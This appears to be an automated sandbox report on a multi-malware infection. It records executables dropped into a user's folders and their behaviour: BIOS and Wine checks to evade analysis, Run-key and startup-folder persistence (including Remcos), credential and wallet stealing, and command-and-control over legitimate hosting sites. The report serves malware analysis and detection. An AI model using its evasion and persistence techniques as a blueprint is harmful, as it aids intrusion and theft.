Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\Files\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\Files\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3020718451.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2568621829.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\seksiak.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\seksiak.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\seksiak.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\pornhub_downloader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\PORNHU~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\svchost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Users\Admin\Desktop\Files\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Users\Admin\Desktop\Files\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\Files\surfex.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\surfex.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\surfex.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\surfex.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Identification-1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\87f3f2.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\KuwaitSetupHockey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\onetap.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
N/A N/A C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Mswgoudnv.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\Desktop\Files\random.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1748_133785013224832643\l4.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\87f3f2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1828_133785013383972473\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_6516_133785013895310577\l4.exe N/A
N/A N/A C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_7532_133785013970182163\l4.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\wow.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\steal_stub.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

VMProtect packed file

vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\Desktop\\New Text Document mod.exse\\a\\networkmanager.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\afasdfga = "C:\\Users\\Admin\\AppData\\Roaming\\afasdfga.exe" C:\Users\Admin\Desktop\Files\Mswgoudnv.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" C:\Users\Admin\Desktop\Files\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" C:\Users\Admin\Desktop\Files\twztl.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\GameBarPresenceWriter.exe N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\powercfg.exe N/A

AutoIT Executable


Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\DirectX\WebSetup C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\DirectX\WebSetup\filelist.dat C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\dsetup32.dll C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\SysWOW64\DirectX\WebSetup\dxupdate.cab C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\SET71B2.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File created C:\Windows\SysWOW64\directx\websetup\SET71B2.tmp C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
File opened for modification C:\Windows\SysWOW64\directx\websetup\dsetup.dll C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe N/A
